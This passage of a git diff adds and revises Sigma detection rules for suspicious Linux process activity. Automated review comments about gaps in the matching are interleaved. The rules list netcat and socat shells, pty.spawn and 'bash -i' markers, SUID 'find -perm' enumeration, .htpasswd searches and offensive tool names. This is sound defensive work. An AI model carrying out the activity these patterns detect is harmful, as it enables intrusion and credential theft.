+ - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
+author: Joseliyo Sanchez, @Joseliyo_Jstnk
+date: 2023/06/02
+tags:
+ - attack.defense_evasion
+ - attack.t1036
+logsource:
+ product: linux
+ category: process_creation
+detection:
+ selection:
+ Image|startswith: '/tmp/'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml
new file mode 100644
index 000000000..7c15f0efb
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml
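Review bot: `Image|startswith: '/tmp/'` covers only one of the world-writable scratch directories; `/var/tmp/` and `/dev/shm/` are equally writable by every local user on a standard Linux system and are not matched, so `Image|startswith: ['/tmp/', '/var/tmp/', '/dev/shm/']` would be the natural list. With `level: high` and `falsepositives: - Unknown`, the rule would also benefit from naming the expected benign sources, such as installers that unpack and run from /tmp, so analysts have something concrete to tune against.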
@@ -0,0 +1,33 @@
+title: Potential Discovery Activity Using Find - Linux
+id: 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf
+related:
+ - id: 85de3a19-b675-4a51-bfc6-b11a5186c971
+ type: similar
+status: test
+description: Detects usage of "find" binary in a suspicious manner to perform discovery
+references:
+ - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/12/28
+tags:
+ - attack.discovery
+ - attack.t1083
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ Image|endswith: '/find'
+ CommandLine|contains:
+ - '-perm -4000'
+ - '-perm -2000'
+ - '-perm 0777'
+ - '-perm -222'
+ - '-perm -o w'
+ - '-perm -o x'
+ - '-perm -u=s'
+ - '-perm -g=s'
+ condition: selection
+falsepositives:
+ - Unknown
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml
new file mode 100644
index 000000000..8abc41bc3
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml
@@ -0,0 +1,41 @@
+title: Suspicious Git Clone - Linux
+id: cfec9d29-64ec-4a0f-9ffe-0fdb856d5446
+status: test
+description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
+references:
+ - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/01/03
+modified: 2023/01/05
+tags:
+ - attack.reconnaissance
+ - attack.t1593.003
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection_img:
+ Image|endswith: '/git'
+ CommandLine|contains: ' clone '
+ selection_keyword:
+ CommandLine|contains:
+ # Add more suspicious keywords
+ - 'exploit'
+ - 'Vulns'
+ - 'vulnerability'
+ - 'RCE'
+ - 'RemoteCodeExecution'
+ - 'Invoke-'
+ - 'CVE-'
+ - 'poc-'
+ - 'ProofOfConcept'
+ # Add more vuln names
+ - 'proxyshell'
+ - 'log4shell'
+ - 'eternalblue'
+ - 'eternal-blue'
+ - 'MS17-'
+ condition: all of selection_*
+falsepositives:
+ - Unknown
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml
index a9dc1f6ff..f520d0b93 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml
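Review bot: Sigma string matching is case-insensitive by default, so the keyword `'RCE'` in `selection_keyword` also matches any repository URL containing `source`, `force` or `commerce`, which makes a `git clone` of many ordinary repositories trigger this rule. Delimited forms such as `'-RCE'`, `'/RCE'`, `'_RCE'` and `'RCE-'`, or a case-sensitive `CommandLine|re` pattern, would keep the intent without the substring collision. `'poc-'` has a similar, smaller exposure and could be delimited the same way.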
@@ -1,26 +1,34 @@
 title: History File Deletion
 id: 1182f3b3-e716-4efa-99ab-d2685d04360f
-status: experimental
+status: test
 description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity
-author: Florian Roth
 references:
- - https://github.com/sleventyeleven/linuxprivchecker/
+ - https://github.com/sleventyeleven/linuxprivchecker/
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
+author: Florian Roth (Nextron Systems)
 date: 2022/06/20
+modified: 2022/09/15
+tags:
+ - attack.impact
+ - attack.t1565.001
 logsource:
- category: process_creation
- product: linux
+ category: process_creation
+ product: linux
 detection:
- selection:
- Image|endswith: '/rm'
- selection_history:
- - CommandLine|contains:
- - '/.bash_history'
- - '/.zsh_history'
- - CommandLine|endswith: '_history'
- condition: all of selection*
+ selection:
+ Image|endswith:
+ - '/rm'
+ - '/unlink'
+ - '/shred'
+ selection_history:
+ - CommandLine|contains:
+ - '/.bash_history'
+ - '/.zsh_history'
+ - CommandLine|endswith:
+ - '_history'
+ - '.history'
+ - 'zhistory'
+ condition: all of selection*
 falsepositives:
- - Legitimate administration activities
+ - Legitimate administration activities
 level: high
-tags:
- - attack.impact
- - attack.t1565.001
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml
index a91de0a28..74f8b6229 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml
@@ -1,26 +1,35 @@
 title: Print History File Contents
 id: d7821ff1-4527-4e33-9f84-d0d57fa2fb66
-status: experimental
+status: test
 description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
-author: Florian Roth
 references:
- - https://github.com/sleventyeleven/linuxprivchecker/
+ - https://github.com/sleventyeleven/linuxprivchecker/
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
+author: Florian Roth (Nextron Systems)
 date: 2022/06/20
+modified: 2022/09/15
+tags:
+ - attack.reconnaissance
+ - attack.t1592.004
 logsource:
- category: process_creation
- product: linux
+ category: process_creation
+ product: linux
 detection:
- selection:
- Image|endswith: '/cat'
- selection_history:
- - CommandLine|contains:
- - '/.bash_history'
- - '/.zsh_history'
- - CommandLine|endswith: '_history'
- condition: all of selection*
+ selection:
+ Image|endswith:
+ - '/cat'
+ - '/head'
+ - '/tail'
+ - '/more'
+ selection_history:
+ - CommandLine|contains:
+ - '/.bash_history'
+ - '/.zsh_history'
+ - CommandLine|endswith:
+ - '_history'
+ - '.history'
+ - 'zhistory'
+ condition: all of selection*
 falsepositives:
- - Legitimate administration activities
+ - Legitimate administration activities
 level: medium
-tags:
- - attack.reconnaissance
- - attack.t1592.004
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_hktl_execution.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_hktl_execution.yml
new file mode 100644
index 000000000..32f9da31b
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_hktl_execution.yml
@@ -0,0 +1,99 @@
+title: Linux HackTool Execution
+id: a015e032-146d-4717-8944-7a1884122111
+status: experimental
+description: Detects known hacktool execution based on image name.
+references:
+ - https://github.com/Gui774ume/ebpfkit
+ - https://github.com/pathtofile/bad-bpf
+ - https://github.com/carlospolop/PEASS-ng
+ - https://github.com/t3l3machus/hoaxshell
+ - https://github.com/t3l3machus/Villain
+ - https://github.com/HavocFramework/Havoc
+ - https://github.com/1N3/Sn1per
+ - https://github.com/Ne0nd0g/merlin
+ - https://github.com/Pennyw0rth/NetExec/
+author: Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure])
+date: 2023/01/03
+modified: 2023/10/25
+tags:
+ - attack.execution
+ - attack.resource_development
+ - attack.t1587
+logsource:
+ product: linux
+ category: process_creation
+detection:
+ selection_c2_frameworks:
+ Image|endswith:
+ - '/crackmapexec'
+ - '/havoc'
+ - '/merlin-agent'
+ - '/merlinServer-Linux-x64'
+ - '/msfconsole'
+ - '/msfvenom'
+ - '/ps-empire server'
+ - '/ps-empire'
+ - '/sliver-client'
+ - '/sliver-server'
+ - '/Villain.py'
+ selection_c2_framework_cobaltstrike:
+ Image|contains:
+ - '/cobaltstrike'
+ - '/teamserver'
+ selection_scanners:
+ Image|endswith:
+ - '/autorecon'
+ - '/httpx'
+ - '/legion'
+ - '/naabu'
+ - '/netdiscover'
+ - '/nmap'
+ - '/nuclei'
+ - '/recon-ng'
+ - '/zenmap'
+ selection_scanners_sniper:
+ Image|contains: '/sniper'
+ selection_web_enum:
+ Image|endswith:
+ - '/dirb'
+ - '/dirbuster'
+ - '/eyewitness'
+ - '/feroxbuster'
+ - '/ffuf'
+ - '/gobuster'
+ - '/wfuzz'
+ - '/whatweb'
+ selection_web_vuln:
+ Image|endswith:
+ - '/joomscan'
+ - '/nikto'
+ - '/wpscan'
+ selection_exploit_tools:
+ Image|endswith:
+ - '/aircrack-ng'
+ - '/bloodhound-python'
+ - '/bpfdos'
+ - '/ebpfki'
+ - '/evil-winrm'
+ - '/hashcat'
+ - '/hoaxshell.py'
+ - '/hydra'
+ - '/john'
+ - '/ncrack'
+ # default binary: https://github.com/Pennyw0rth/NetExec/releases/download/v1.0.0/nxc-ubuntu-latest
+ - '/nxc-ubuntu-latest'
+ - '/pidhide'
+ - '/pspy32'
+ - '/pspy32s'
+ - '/pspy64'
+ - '/pspy64s'
+ - '/setoolkit'
+ - '/sqlmap'
+ - '/writeblocker'
+ selection_linpeas:
+ # covers: all linux versions listed here: https://github.com/carlospolop/PEASS-ng/releases
+ Image|contains: '/linpeas'
+ condition: 1 of selection_*
+falsepositives:
+ - Unlikely
+level: high
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml
new file mode 100644
index 000000000..0b288ba24
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml
@@ -0,0 +1,28 @@
+title: Potential Container Discovery Via Inodes Listing
+id: 43e26eb5-cd58-48d1-8ce9-a273f5d298d8
+status: experimental
+description: Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container.
+references:
+ - https://blog.skyplabs.net/posts/container-detection/
+ - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker
+tags:
+ - attack.discovery
+ - attack.t1082
+author: Seth Hanford
+date: 2023/08/23
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection:
+ # inode outside containers low, inside high
+ Image|endswith: '/ls'
+ CommandLine|contains|all:
+ - ' -*i' # -i finds inode number
+ - ' -*d' # -d gets directory itself, not contents
+ CommandLine|endswith: ' /'
+ condition: selection
+falsepositives:
+ - Legitimate system administrator usage of these commands
+ - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered
+level: low
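Review bot: `'/ps-empire server'` under `Image|endswith` in `selection_c2_frameworks` looks like a command-line pattern rather than an image path: the `Image` field carries the executable path and never the `server` argument, so this entry cannot match, and the adjacent `'/ps-empire'` already covers the binary; dropping the `- '/ps-empire server'` line is the minimal fix. The `'/Villain.py'` and `'/hoaxshell.py'` entries deserve a similar look, since when a script is started through its interpreter the image is typically the interpreter and the script name appears only in CommandLine; whether they ever match depends on how the log source populates `Image`, so a `CommandLine|contains` companion selection may be needed.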
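Review bot: `' -*i'` and `' -*d'` in `CommandLine|contains|all` use `*` as a Sigma wildcard, so each is satisfied by any `i` or `d` that appears anywhere after a space-dash, not only inside the flag cluster; `ls -l /media /` satisfies both through the letters of `media`. Since the comments describe `-i` and `-d` as flags, enumerating the flag forms in a plain `CommandLine|contains` list, e.g. `' -id '`, `' -di '`, `' -i -d '`, `' -d -i '`, plus whichever combined clusters are wanted, expresses the intent without the wildcard over-match; the `CommandLine|endswith: ' /'` check can stay as is.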
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml
index 6009d43ce..f4d1b9094 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml
@@ -1,30 +1,35 @@
 title: Interactive Bash Suspicious Children
 id: ea3ecad2-db86-4a89-ad0b-132a10d2db55
-status: experimental
+status: test
 description: Detects suspicious interactive bash as a parent to rather uncommon child processes
 references:
- - Internal Research
+ - Internal Research
+author: Florian Roth (Nextron Systems)
 date: 2022/03/14
-author: Florian Roth
+tags:
+ - attack.execution
+ - attack.defense_evasion
+ - attack.t1059.004
+ - attack.t1036
 logsource:
- product: linux
- category: process_creation
+ product: linux
+ category: process_creation
 detection:
- selection:
- ParentCommandLine: 'bash -i'
- anomaly1:
- CommandLine|contains:
- - '-c import '
- - 'base64'
- - 'pty.spawn'
- anomaly2:
- Image|endswith:
- - 'whoami'
- - 'iptables'
- - '/ncat'
- - '/nc'
- - '/netcat'
- condition: selection and 1 of anomaly*
+ selection:
+ ParentCommandLine: 'bash -i'
+ anomaly1:
+ CommandLine|contains:
+ - '-c import '
+ - 'base64'
+ - 'pty.spawn'
+ anomaly2:
+ Image|endswith:
+ - 'whoami'
+ - 'iptables'
+ - '/ncat'
+ - '/nc'
+ - '/netcat'
+ condition: selection and 1 of anomaly*
 falsepositives:
- - Legitimate software that uses these patterns
+ - Legitimate software that uses these patterns
 level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml
index 4e71ecba4..4e9106596 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml
@@ -1,11 +1,11 @@
 title: Suspicious Java Children Processes
 id: d292e0af-9a18-420c-9525-ec0ac3936892
-status: experimental
+status: test
 description: Detects java process spawning suspicious children
-author: Nasreddine Bencherchali
-date: 2022/06/03
 references:
 - https://www.tecmint.com/different-types-of-linux-shells/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2022/06/03
 tags:
 - attack.execution
 - attack.t1059
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml
new file mode 100644
index 000000000..8111a5334
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml
@@ -0,0 +1,42 @@
+title: Linux Network Service Scanning Tools Execution
+id: 3e102cd9-a70d-4a7a-9508-403963092f31
+status: test
+description: Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md
+ - https://github.com/projectdiscovery/naabu
+ - https://github.com/Tib3rius/AutoRecon
+author: Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure])
+date: 2020/10/21
+modified: 2023/10/25
+tags:
+ - attack.discovery
+ - attack.t1046
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection_netcat:
+ Image|endswith:
+ - '/nc'
+ - '/ncat'
+ - '/netcat'
+ - '/socat'
+ selection_network_scanning_tools:
+ Image|endswith:
+ - '/autorecon'
+ - '/hping'
+ - '/hping2'
+ - '/hping3'
+ - '/naabu'
+ - '/nmap'
+ - '/nping'
+ - '/telnet' # could be wget, curl, ssh, many things. basically everything that is able to do network connection. consider fine tuning
+ filter_main_netcat_listen_flag:
+ CommandLine|contains:
+ - ' --listen '
+ - ' -l '
+ condition: (selection_netcat and not filter_main_netcat_listen_flag) or selection_network_scanning_tools
+falsepositives:
+ - Legitimate administration activities
+level: low
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml
index e89e239d6..ea7c51a21 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml
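Review bot: `filter_main_netcat_listen_flag` requires a space on both sides of `-l`/`--listen`, so a listener started with a combined short-flag cluster (`-lvnp`, `-lp`) or with `-l` as the final token is not excluded and will alert as if it were a scan, the opposite of the filter's intent. A `' -l'` contains entry covers the end-of-line case; the clustered form needs a `CommandLine|re` that allows `l` inside a short-flag group, and either should be tested against recorded command lines first since `-l` also occurs inside unrelated flags. Note that this listen filter is the only thing keeping the netcat half quiet on hosts that run netcat listeners by design, so its gaps translate directly into volume for a `level: low` rule.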
@@ -1,28 +1,35 @@ title: Linux Shell Pipe to Shell id: 880973f3-9708-491c-a77b-2a35a1921158 -status: experimental +status: test description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell references: - - Internal Research + - Internal Research +author: Florian Roth (Nextron Systems) date: 2022/03/14 -author: Florian Roth +modified: 2022/07/26 tags: - attack.defense_evasion - attack.t1140 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - CommandLine|startswith: - - 'sh -c ' - - 'bash -c ' - CommandLine|endswith: - - '| bash' - - '|bash' - - '| sh' - - '|sh' - condition: selection + selection: + CommandLine|startswith: + - 'sh -c ' + - 'bash -c ' + selection_exec: + - CommandLine|contains: + - '| bash ' + - '| sh ' + - '|bash ' + - '|sh ' + - CommandLine|endswith: + - '| bash' + - '| sh' + - '|bash' + - ' |sh' + condition: all of selection* falsepositives: - - Legitimate software that uses these patterns + - Legitimate software that uses these patterns level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml index 190477e5a..d2581b081 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml 
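Review bot: In `selection_exec`, the `endswith` list has `' |sh'` with a leading space while its sibling `'|bash'` has none, so a command line ending in `...|sh` with no space before the pipe is missed even though the equivalent `...|bash` is caught; the four `contains` entries above are symmetric, which makes the asymmetry look like a typo. Change the entry to `- '|sh'` so both shells are treated alike. The hunk covers the whole file.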
@@ -1,25 +1,25 @@ title: Linux Recon Indicators id: 0cf7a157-8879-41a2-8f55-388dd23746b7 -status: experimental +status: test description: Detects events with patterns found in commands used for reconnaissance on linux systems -author: Florian Roth references: - - https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py + - https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py +author: Florian Roth (Nextron Systems) date: 2022/06/20 +tags: + - attack.reconnaissance + - attack.t1592.004 + - attack.credential_access + - attack.t1552.001 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - CommandLine|contains: - - ' -name .htpasswd' - - ' -perm -4000 ' - condition: selection + selection: + CommandLine|contains: + - ' -name .htpasswd' + - ' -perm -4000 ' + condition: selection falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: high -tags: - - attack.reconnaissance - - attack.t1592.004 - - attack.credential_access - - attack.t1552.001 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml new file mode 100644 index 000000000..7d5a91f86 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml 
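Review bot: `' -perm -4000 '` carries a trailing space, so the common form where the permission test is the last argument (`find / -perm -4000`) does not match, while the neighbouring `' -name .htpasswd'` has no such trailing requirement; the two entries are inconsistent. Dropping the trailing space (`- ' -perm -4000'`) keeps the leading-space anchor and covers both argument positions. The commit only re-indents this block and moves `tags`, so the gap is pre-existing, but it is cheap to close while the file is being touched.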
@@ -0,0 +1,50 @@
+title: Potential Suspicious Change To Sensitive/Critical Files
+id: 86157017-c2b1-4d4a-8c33-93b8e67e4af4
+status: experimental
+description: Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.
+references:
+ - https://docs.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor
+author: '@d4ns4n_ (Wuerth-Phoenix)'
+date: 2023/05/30
+tags:
+ - attack.impact
+ - attack.t1565.001
+logsource:
+ category: process_creation
+ product: linux
+detection:
+ selection_img_1:
+ Image|endswith:
+ - '/cat'
+ - '/echo'
+ - '/grep'
+ - '/head'
+ - '/more'
+ - '/tail'
+ CommandLine|contains: '>'
+ selection_img_2:
+ Image|endswith:
+ - '/emacs'
+ - '/nano'
+ - '/sed'
+ - '/vi'
+ - '/vim'
+ selection_paths:
+ CommandLine|contains:
+ - '/bin/login'
+ - '/bin/passwd'
+ - '/boot/'
+ - '/etc/*.conf'
+ - '/etc/cron.' # Covers different cron config files "daily", "hourly", etc.
+ - '/etc/crontab'
+ - '/etc/hosts'
+ - '/etc/init.d'
+ - '/etc/sudoers'
+ - '/opt/bin/'
+ - '/sbin' # Covers: '/opt/sbin', '/usr/local/sbin/', '/usr/sbin/'
+ - '/usr/bin/'
+ - '/usr/local/bin/'
+ condition: 1 of selection_img_* and selection_paths
+falsepositives:
+ - Some false positives are to be expected on user or administrator machines. Apply additional filters as needed.
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml
new file mode 100644
index 000000000..64236d73d
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml
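Review bot: `selection_img_1` pairs `cat`/`echo`/`grep`/`head`/`more`/`tail` with `CommandLine|contains: '>'`, but an output redirection is consumed by the invoking shell and does not normally appear in the command line of the child process: the `cat` process sees only its file arguments, while the `>` lives in the parent shell's `-c` string. As written, that half of the rule fires mainly when `>` is passed as a literal argument, so it will rarely match a real redirect; either match the shell image with `CommandLine|contains|all` of the tool name, `'>'` and the path, or drop the `'>'` requirement and say in the description why the editor-based `selection_img_2` is the primary signal. Verify against a sample from the collector in use, since some process-creation sources do attach the full shell command line to the child. `selection_paths` also omits `/etc/passwd` and `/etc/shadow`, which most file-integrity baselines treat as critical; confirm against the referenced Microsoft list before adding them.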
@@ -0,0 +1,31 @@
+title: Shell Execution Of Process Located In Tmp Directory
+id: 2fade0b6-7423-4835-9d4f-335b39b83867
+status: experimental
+description: Detects execution of shells from a parent process located in a temporary (/tmp) directory
+references:
+ - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
+ - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
+ - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
+ - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
+author: Joseliyo Sanchez, @Joseliyo_Jstnk
+date: 2023/06/02
+tags:
+ - attack.execution
+logsource:
+ product: linux
+ category: process_creation
+detection:
+ selection:
+ ParentImage|startswith: '/tmp/'
+ Image|endswith:
+ - '/bash'
+ - '/csh'
+ - '/dash'
+ - '/fish'
+ - '/ksh'
+ - '/sh'
+ - '/zsh'
+ condition: selection
+falsepositives:
+ - Unknown
+level: high
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml
new file mode 100644
index 000000000..71eedc0df
--- /dev/null
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml
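Review bot: `ParentImage|startswith: '/tmp/'` is the only staging location covered, yet `/var/tmp/` and `/dev/shm/` are equally world-writable and are the usual alternatives seen in the same class of tooling; turning the value into a list (`- '/tmp/'`, `- '/var/tmp/'`, `- '/dev/shm/'`) costs nothing in precision. The same single-path choice appears in `selection_paths` of the script-execution rule in the next hunk and in `selection_path` of the wget rule later in this commit, so whichever directory list is settled on should be applied to all three. `falsepositives: Unknown` is thin for a `level: high` rule; packaging and CI tooling that unpack helpers under `/tmp` are a known source and deserve a line.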
@@ -0,0 +1,35 @@
+title: Execution Of Script Located In Potentially Suspicious Directory
+id: 30bcce26-51c5-49f2-99c8-7b59e3af36c7
+status: experimental
+description: Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc.
+references:
+ - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
+ - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
+ - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
+ - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
+author: Joseliyo Sanchez, @Joseliyo_Jstnk
+date: 2023/06/02
+tags:
+ - attack.execution
+logsource:
+ product: linux
+ category: process_creation
+detection:
+ selection_img:
+ Image|endswith:
+ - '/bash'
+ - '/csh'
+ - '/dash'
+ - '/fish'
+ - '/ksh'
+ - '/sh'
+ - '/zsh'
+ selection_flag:
+ CommandLine|contains: ' -c '
+ selection_paths:
+ # Note: Add more suspicious paths
+ CommandLine|contains: '/tmp/'
+ condition: all of selection_*
+falsepositives:
+ - Unknown
+level: medium
diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml
index 8bec4ce24..f45de992b 100644
--- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml
+++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml
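Review bot: `selection_flag` requires `' -c '`, but a script in a suspicious directory is most often run as `bash /tmp/x.sh` or `sh /tmp/x.sh` with no `-c` at all, so the title ("Execution Of Script Located In Potentially Suspicious Directory") promises more than `condition: all of selection_*` delivers. Either drop `selection_flag` from the condition and rely on `selection_img` plus `selection_paths`, or rename the rule to say it targets the `-c` form. The `# Note: Add more suspicious paths` comment should name what is deliberately left out so a later editor knows whether the omission was tuning or an oversight.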
@@ -2,11 +2,11 @@ title: System Information Discovery id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 status: stable description: Detects system information discovery commands +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md author: Ömer Günal, oscd.community date: 2020/10/08 modified: 2021/09/14 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md tags: - attack.discovery - attack.t1082 @@ -16,13 +16,13 @@ logsource: detection: selection: Image|endswith: - - '/uname' - - '/hostname' - - '/uptime' - - '/lspci' - - '/dmidecode' - - '/lscpu' - - '/lsmod' + - '/uname' + - '/hostname' + - '/uptime' + - '/lspci' + - '/dmidecode' + - '/lscpu' + - '/lsmod' condition: selection falsepositives: - Legitimate administration activities diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml index b013e068b..0b2ca2e7a 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml 
@@ -1,27 +1,30 @@ -title: System Network Connections Discovery +title: System Network Connections Discovery - Linux id: 4c519226-f0cd-4471-bd2f-6fbb2bb68a79 status: test description: Detects usage of system utilities to discover system network connections -author: Daniil Yugoslavskiy, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md +author: Daniil Yugoslavskiy, oscd.community date: 2020/10/19 -modified: 2021/11/27 +modified: 2023/01/17 +tags: + - attack.discovery + - attack.t1049 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - selection: - Image|endswith: - - '/who' - - '/w' - - '/last' - - '/lsof' - - '/netstat' - condition: selection + selection: + Image|endswith: + - '/who' + - '/w' + - '/last' + - '/lsof' + - '/netstat' + filter_landscape_sysinfo: + ParentCommandLine|contains: '/usr/bin/landscape-sysinfo' + Image|endswith: '/who' + condition: selection and not 1 of filter_* falsepositives: - - Legitimate activities + - Legitimate activities level: low -tags: - - attack.discovery - - attack.t1049 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml index 891e743f3..69a1c8799 100644 --- 